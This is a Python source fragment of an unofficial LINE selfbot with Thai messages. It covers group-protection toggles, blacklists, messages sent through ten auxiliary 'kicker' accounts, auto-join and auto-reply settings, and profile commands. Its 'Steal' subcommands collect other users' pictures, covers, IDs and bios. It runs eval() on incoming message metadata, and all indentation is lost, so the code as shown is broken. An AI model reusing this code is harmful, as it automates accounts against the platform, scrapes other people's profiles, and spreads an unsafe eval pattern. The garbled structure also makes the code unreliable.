#===========Protection============#
elif 'Po1 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po1 ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "URL Protect Start"
else:
protectqr.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "URL Protect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT URL」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "URL Protect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "URL Protect Trun off"
line.sendMessage(msg.to, "「STATUS PROTECT URL」\n" + msgs)
elif 'Po2 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po2 ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Kick Member Protect Start"
else:
protectkick.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Kick Member Protect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT KICK」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Kick Member Protect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "Kick Member Protect Trun off"
line.sendMessage(msg.to, "「STATUS PROTECT KICK」\n" + msgs)
elif 'Po3 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po3 ','')
if spl == 'on':
if msg.to in protecARoin:
msgs = "Joinkick Start"
else:
protecARoin.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Joinkick Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT JOIN」\n" + msgs)
elif spl == 'off':
if msg.to in protecARoin:
protecARoin.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Joinkick Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "Joinkick Trun off"
line.sendMessage(msg.to, "「STATUS PROTECT JOIN」\n" + msgs)
elif 'Protectcanceljs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcanceljs ','')
if spl == 'on':
if msg.to in protectcanceljs:
msgs = "ป้องกันยกเลิกเชิญบอทเปิดใช้งาน"
else:
protectcanceljs[msg.to] = True
f=codecs.open('protectcanceljs.json','w','utf-8')
json.dump(protectcanceljs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญบอทเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif spl == 'off':
if msg.to in protectcanceljs:
del protectcanceljs[msg.to]
f=codecs.open('protectcanceljs.json','w','utf-8')
json.dump(protectcanceljs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญบอทปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันยกเลิกเชิญบอทปิดใช้งาน"
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "ป้องกันยกเลิกเชิญถูกเปิดใช้งานอยู่แล้ว"
else:
protectcancel[msg.to] = True
f=codecs.open('protectcancel.json','w','utf-8')
json.dump(protectcancel, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
del protectcancel[msg.to]
f=codecs.open('protectcancel.json','w','utf-8')
json.dump(protectcancel, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันยกเลิกเชิญถูกปิดใช้งานอยู่แล้ว"
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif 'Po4 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po4 ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "InviteProtect Start"
else:
protectinvite[msg.to] = True
f=codecs.open('protectinvite.json','w','utf-8')
json.dump(protectinvite, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "InviteProtect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
del protectinvite[msg.to]
f=codecs.open('protectinvite.json','w','utf-8')
json.dump(protectinvite, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "InviteProtect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "InviteProtect Trun off"
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif 'Antijs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Antijs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "ป้องกันJSถูกเปิดใช้งานอยู่แล้ว"
else:
protectantijs[msg.to] = True
f=codecs.open('protectantijs.json','w','utf-8')
json.dump(protectantijs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันJSเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
del protectantijs[msg.to]
f=codecs.open('protectantijs.json','w','utf-8')
json.dump(protectantijs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันJSปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันJSถูกปิดใช้งานอยู่แล้ว"
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif "whois " in msg.text.lower():
spl = re.split("whois ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
msg.contentType = 13
msg.text = None
msg.contentMetadata = {"mid":spl[1]}
line.sendMessage(msg.to,text = None,contentMetadata = {"mid":spl[1]},contentType = 13)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "เปิดใช้งานโหมด Ghost"
else:
ghost[msg.to] = True
f=codecs.open('ghost.json','w','utf-8')
json.dump(ghost, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "เปิดใช้งานโหมด Ghost\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
del ghost[msg.to]
f=codecs.open('ghost.json','w','utf-8')
json.dump(ghost, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ปิดใช้งานโหมด Ghost\nIn Group : " +str(ginfo.name)
else:
msgs = "ปิดใช้งานโหมด Ghost"
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif ("ส่อง " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = line.getContact(key1)
line.sendMessage(msg.to, "ชื่อ : "+str(mi.displayName)+"\nMID : " +key1)
line.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
line.sendMessage(msg.to,"เพิ่มบัญชีดำสำเร็จแล้ว")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
line.sendMessage(msg.to,"ลบบัญชีดำสำเร็จแล้ว")
except:
pass
elif cmd == "ban":
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
line.sendMessage(to,"Send contact you will be blacklist")
elif cmd == "unban":
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
line.sendMessage(to,"Send contact you will be whitelist")
elif cmd == "bc":
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
line.sendMessage(msg.to,"ไม่พบคนติดดำ")
else:
ma = ""
for i in wait["blacklist"]:
ma = line.getContact(i)
line.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "cb":
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = line.getContacts(wait["blacklist"])
mc = "「%i」User Blacklist" % len(ragets)
line.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker2.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker3.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker4.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker5.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker6.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker7.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker8.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker9.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
kicker10.sendMessage(to,"ปลดแบนสมาชิกแล้ว~ " +mc)
elif cmd.startswith('error'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Error 」'
res += '\n├ Usage : '
res += '\n│ • {key}Error'
res += '\n│ • {key}Error Logs'
res += '\n│ • {key}Error Reset'
res += '\n│ • {key}Error Detail <errid>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'error':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cond[0].lower() == 'logs':
try:
filee = open('errorLog.txt', 'r')
except FileNotFoundError:
return line.sendMessage(to, 'ไม่สามารถแสดงบันทึกข้อผิดพลาดได้\nไม่พบไฟล์')
errors = [err.strip() for err in filee.readlines()]
filee.close()
if not errors: return line.sendMessage(to, 'ไม่สามารถแสดงบันทึกข้อผิดพลาดได้\nบันทึกข้อผิดพลาดว่างเปล่า')
res = '╭───「 Error Logs 」'
res += '\n├ List :'
parsed_len = len(errors)//200+1
no = 0
for point in range(parsed_len):
for error in errors[point*200:(point+1)*200]:
if not error: continue
no += 1
res += '\n│ %i. %s' % (no, error)
if error == errors[-1]:
res += '\n╰───「SelfBot ProtectV2.2」'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cond[0].lower() == 'reset':
filee = open('errorLog.txt', 'w')
filee.write('')
filee.close()
shutil.rmtree('tmp/errors/', ignore_errors=True)
os.system('mkdir tmp/errors')
line.sendMessage(to, 'Success reset error logs')
elif cond[0].lower() == 'detail':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
errid = cond[1]
if os.path.exists('tmp/errors/%s.txt' % errid):
with open('tmp/errors/%s.txt' % errid, 'r') as f:
line.sendMessage(to, f.read())
else:
return line.sendMessage(to, 'Failed display details error, errorid not valid')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif txt.startswith('setkey'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Setting Key 」'
res += '\n├ Status : ' + bool_dict[settings['setKey']['status']][1]
res += '\n├ Key : ' + settings['setKey']['key'].title()
res += '\n├ Usage : '
res += '\n│ • Setkey'
res += '\n│ • Setkey <on/off>'
res += '\n│ • Setkey <key>'
res += '\n╰───「SelfBot ProtectV2.2」'
if txt == 'setkey':
line.sendMessage(to, parsingRes(res))
elif texttl == 'on':
if settings['setKey']['status']:
line.sendMessage(to, 'Failed activate setkey, setkey already active')
else:
settings['setKey']['status'] = True
line.sendMessage(to, 'Success activated setkey')
elif texttl == 'off':
if not settings['setKey']['status']:
line.sendMessage(to, 'Failed deactivate setkey, setkey already deactive')
else:
settings['setKey']['status'] = False
line.sendMessage(to, 'Success deactivated setkey')
else:
settings['setKey']['key'] = texttl
line.sendMessage(to, 'Success change set key to (%s)' % textt)
elif cmd.startswith('autoadd'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Auto Add 」'
res += '\n├ Status : ' + bool_dict[settings['autoAdd']['status']][1]
res += '\n├ Reply : ' + bool_dict[settings['autoAdd']['reply']][0]
res += '\n├ Reply Message : ' + settings['autoAdd']['message']
res += '\n├ Usage : '
res += '\n│ • {key}AutoAdd'
res += '\n│ • {key}AutoAdd <on/off>'
res += '\n│ • {key}AutoAdd Reply <on/off>'
res += '\n│ • {key}AutoAdd <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'autoadd':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoAdd']['status']:
line.sendMessage(to, 'เปิดรับแอดออโต้')
else:
settings['autoAdd']['status'] = True
line.sendMessage(to, 'เปิดรับแอดออโต้')
elif texttl == 'off':
if not settings['autoAdd']['status']:
line.sendMessage(to, 'ปิดรับแอดออโต้')
else:
settings['autoAdd']['status'] = False
line.sendMessage(to, 'ปิดรับแอดออโต้')
elif cond[0].lower() == 'reply':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoAdd']['reply']:
line.sendMessage(to, 'เปิดข้อความทักคนแอด')
else:
settings['autoAdd']['reply'] = True
line.sendMessage(to, 'เปิดข้อความทักคนแอด')
elif cond[1].lower() == 'off':
if not settings['autoAdd']['reply']:
line.sendMessage(to, 'ปิดข้อความทักคนแอด')
else:
settings['autoAdd']['reply'] = False
line.sendMessage(to, 'ปิดข้อความทักคนแอด')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
settings['autoAdd']['message'] = textt
line.sendMessage(to, 'เปลี่ยนข้อความออโต้แอดเป็น `%s`' % textt)
elif cmd.startswith('autojoin'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Auto Join 」'
res += '\n├ Status : ' + bool_dict[settings['autoJoin']['status']][1]
res += '\n├ Reply : ' + bool_dict[settings['autoJoin']['reply']][0]
res += '\n├ Reply Message : ' + settings['autoJoin']['message']
res += '\n├ Usage : '
res += '\n│ • {key}AutoJoin'
res += '\n│ • {key}AutoJoin <on/off>'
res += '\n│ • {key}AutoJoin Ticket <on/off>'
res += '\n│ • {key}AutoJoin Reply <on/off>'
res += '\n│ • {key}AutoJoin <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'autojoin':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoJoin']['status']:
line.sendMessage(to, 'เปิดเข้าร่วมกลุ่มออโต้')
else:
settings['autoJoin']['status'] = True
line.sendMessage(to, 'เปิดเข้าร่วมกลุ่มออโต้')
elif texttl == 'off':
if not settings['autoJoin']['status']:
line.sendMessage(to, 'ปิดเข้าร่วมกลุ่มออโต้')
else:
settings['autoJoin']['status'] = False
line.sendMessage(to, 'ปิดเข้าร่วมกลุ่มออโต้')
elif cond[0].lower() == 'reply':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoJoin']['reply']:
line.sendMessage(to, 'เปิดความทักคนเชิญเข้ากลุ่ม')
else:
settings['autoJoin']['reply'] = True
line.sendMessage(to, 'เปิดความทักคนเชิญเข้ากลุ่ม')
elif cond[1].lower() == 'off':
if not settings['autoJoin']['reply']:
line.sendMessage(to, 'ปิดความทักคนเชิญเข้ากลุ่ม')
else:
settings['autoJoin']['reply'] = False
line.sendMessage(to, 'ปิดความทักคนเชิญเข้ากลุ่ม')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cond[0].lower() == 'ticket':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoJoin']['ticket']:
line.sendMessage(to, 'เปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
settings['autoJoin']['ticket'] = True
line.sendMessage(to, 'เปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
elif cond[1].lower() == 'off':
if not settings['autoJoin']['ticket']:
line.sendMessage(to, 'ปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
settings['autoJoin']['ticket'] = False
line.sendMessage(to, 'ปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
settings['autoJoin']['message'] = textt
line.sendMessage(to, 'ข้อความทักคนเชิญเข้ากลุ่มเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autorespondmention'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Auto Respond 」'
res += '\n├ Status : ' + bool_dict[settings['autoRespondMention']['status']][1]
res += '\n├ Reply Message : ' + settings['autoRespondMention']['message']
res += '\n├ Usage : '
res += '\n│ • {key}AutoRespondMention'
res += '\n│ • {key}AutoRespondMention <on/off>'
res += '\n│ • {key}AutoRespondMention <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'autorespondmention':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoRespondMention']['status']:
line.sendMessage(to, 'เปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['status'] = True
line.sendMessage(to, 'เปิดตอบกลับคนแทค')
elif texttl == 'off':
if not settings['autoRespondMention']['status']:
line.sendMessage(to, 'ปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['status'] = False
line.sendMessage(to, 'ปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['message'] = textt
line.sendMessage(to, 'ข้อความตอบกลับคนแทคเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autorespond'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Auto Respond 」'
res += '\n├ Status : ' + bool_dict[settings['autoRespond']['status']][1]
res += '\n├ Reply Message : ' + settings['autoRespond']['message']
res += '\n├ Usage : '
res += '\n│ • {key}AutoRespond'
res += '\n│ • {key}AutoRespond <on/off>'
res += '\n│ • {key}AutoRespond <message>'
res += '\n╰───「SelfBot ProtectV2.2」'
if cmd == 'autorespond':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoRespond']['status']:
line.sendMessage(to, 'เปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['status'] = True
line.sendMessage(to, 'เปิดตอบกลับอัตโนมัติ')
elif texttl == 'off':
if not settings['autoRespond']['status']:
line.sendMessage(to, 'ปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['status'] = False
line.sendMessage(to, 'ปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['message'] = textt
line.sendMessage(to, 'ข้อความเปิดตอบกลับอัตโนมัติถูกเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autoread '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['autoRead']:
line.sendMessage(to, 'เปิดอ่านออโต้')
else:
settings['autoRead'] = True
line.sendMessage(to, 'เปิดอ่านออโต้')
elif texttl == 'off':
if not settings['autoRead']:
line.sendMessage(to, 'ปิดอ่านออโต้')
else:
settings['autoRead'] = False
line.sendMessage(to, 'ปิดอ่านออโต้')
elif cmd.startswith('checkcontact '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkContact']:
line.sendMessage(to, 'เปิดเช็คคท')
else:
settings['checkContact'] = True
line.sendMessage(to, 'เปิดเช็คคท')
elif texttl == 'off':
if not settings['checkContact']:
line.sendMessage(to, 'ปิดเช็คคท')
else:
settings['checkContact'] = False
line.sendMessage(to, 'ปิดเช็คคท')
elif cmd.startswith('checkpost '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkPost']:
line.sendMessage(to, 'เปิดเช็คโพส')
else:
settings['checkPost'] = True
line.sendMessage(to, 'เปิดเช็คโพส')
elif texttl == 'off':
if not settings['checkPost']:
line.sendMessage(to, 'ปิดเช็คโพส')
else:
settings['checkPost'] = False
line.sendMessage(to, 'ปิดเช็คโพส')
elif cmd.startswith('checksticker '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkSticker']:
line.sendMessage(to, 'เปิดเช็คสติ๊กเกอร์')
else:
settings['checkSticker'] = True
line.sendMessage(to, 'เปิดเช็คสติ๊กเกอร์')
elif texttl == 'off':
if not settings['checkSticker']:
line.sendMessage(to, 'ปิดเช็คสติ๊กเกอร์')
else:
settings['checkSticker'] = False
line.sendMessage(to, 'ปิดเช็คสติ๊กเกอร์')
elif cmd.startswith('myprofile'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
profile = line.getProfile()
res = '╭───「 My Profile 」'
res += '\n├ MID : ' + profile.mid
res += '\n├ Display Name : ' + str(profile.displayName)
res += '\n├ Usage : '
res += '\n│ • {key}MyProfile'
res += '\n│ • {key}MyProfile MID'
res += '\n│ • {key}MyProfile Name'
res += '\n│ • {key}MyProfile Bio'
res += '\n│ • {key}MyProfile Pict'
res += '\n│ • {key}MyProfile Cover'
res += '\n│ • {key}MyProfile Change Name <name>'
res += '\n│ • {key}MyProfile Change Bio <bio>'
res += '\n│ • {key}MyProfile Change Pict'
res += '\n│ • {key}MyProfile Change Cover'
res += '\n╰───「SelfBot ProtectV2.2」'
if texttl == 'mid':
line.sendMessage(to, '「 MID 」\n' + str(profile.mid))
elif texttl == 'name':
line.sendMessage(to, '「 Display Name 」\n' + str(profile.displayName))
elif texttl == 'bio':
line.sendMessage(to, '「 Status Message 」\n' + str(profile.statusMessage))
elif texttl == 'pict':
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
line.sendMessage(to, '「 Picture Status 」\n' + path)
else:
line.sendMessage(to, 'ไม่สามารถแสดงรูปได้เนื่องจากผู้ใช้นี้ไม่ได้ใส่รูป')
elif texttl == 'cover':
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '「 Cover Picture 」\n' + str(cover))
elif texttl.startswith('change '):
texts = textt[7:]
textsl = texts.lower()
if textsl.startswith('name '):
name = texts[5:]
if len(name) <= 20:
profile.displayName = name
line.updateProfile(profile)
line.sendMessage(to, 'เปลี่ยนชื่อสำเร็จ\nเปลี่ยนชื่อเป็น`%s`' % name)
else:
line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อได้\nความยาวของชื่อต้องไม่เกิน 20')
elif textsl.startswith('bio '):
bio = texts[4:]
if len(bio) <= 3000:
profile.statusMessage = bio
line.updateProfile(profile)
line.sendMessage(to, 'เปลี่ยนสถานะเรียบร้อย\nเปลี่ยนสถนานะเป็น `%s`' % bio)
else:
line.sendMessage(to, 'ไม่สามารถเปลี่ยนสถานะได้\nความยาวของข้อความสถานะต้องไม่เกิน3000')
elif textsl == 'pict':
settings['changePictureProfile'] = True
line.sendMessage(to, 'กรุณาส่งภาพเพื่อเปลี่ยนรูปโปรไฟล์, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
elif textsl == 'cover':
settings['changeCoverProfile'] = True
line.sendMessage(to, 'กรุณาส่งภาพเพื่อเปลี่ยนรูปปก, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('profile'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
profile = line.getContact(to) if msg.toType == 0 else None
res = '╭───「 My Profile 」'
if profile:
res += '\n├ MID : ' + profile.mid
res += '\n├ Display Name : ' + str(profile.displayName)
if profile.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(profile.displayNameOverridden)
res += '\n├ Status Message : ' + str(profile.statusMessage)
res += '\n├ Usage : '
res += '\n│ • {key}Profile'
res += '\n│ • {key}Profile Mid'
res += '\n│ • {key}Profile Name'
res += '\n│ • {key}Profile Bio'
res += '\n│ • {key}Profile Pict'
res += '\n│ • {key}Profile Cover'
res += '\n│ • {key}Profile Steal Profile <mention>'
res += '\n│ • {key}Profile Steal Mid <mention>'
res += '\n│ • {key}Profile Steal Name <mention>'
res += '\n│ • {key}Profile Steal Bio <mention>'
res += '\n│ • {key}Profile Steal Pict <mention>'
res += '\n│ • {key}Profile Steal Cover <mention>'
res += '\n╰───「SelfBot ProtectV2.2」'
if texttl == 'mid':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
line.sendMessage(to, '「 MID 」\n' + str(profile.mid))
elif texttl == 'name':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
line.sendMessage(to, '「 Display Name 」\n' + str(profile.displayName))
elif texttl == 'bio':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
line.sendMessage(to, '「 Status Message 」\n' + str(profile.statusMessage))
elif texttl == 'pict':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
line.sendMessage(to, '「 Picture Status 」\n' + path)
else:
line.sendMessage(to, 'ไม่สามารถแสดงรูปได้เนื่องจากผู้ใช้นี้ไม่ได้ใส่รูป')
elif texttl == 'cover':
if msg.toType != 0: return line.sendMessage(to, 'คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น')
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '「 Cover Picture 」\n' + str(cover))
elif texttl.startswith('steal '):
texts = textt[6:]
textsl = texts.lower()
if textsl.startswith('profile '):
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
profile = line.getContact(mention['M'])
if profile.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + profile.pictureStatus)
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Profile 」'
res += '\n├ MID : ' + profile.mid
res += '\n├ Display Name : ' + str(profile.displayName)
if profile.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(profile.displayNameOverridden)
res += '\n├ Status Message : ' + str(profile.statusMessage)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงรูปโปรไฟล์ได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('mid '):
res = '╭───「 MID 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
mid = mentions['MENTIONEES'][0]['M']
return line.sendMessage(to, '「 MID 」\n' + mid)
for mention in mentions['MENTIONEES']:
mid = mention['M']
no += 1
res += '\n│ %i. %s' % (no, mid)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงmidได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('name '):
res = '╭───「 Display Name 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
return line.sendMessage(to, '「 Display Name 」\n' + str(profile.displayName))
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
res += '\n│ %i. %s' % (no, profile.displayName)
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงชื่อได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('bio '):
res = '╭───「 Status Message 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
return line.sendMessage(to, '「 Status Message 」\n' + str(profile.statusMessage))
for mention in mentions['MENTIONEES']:
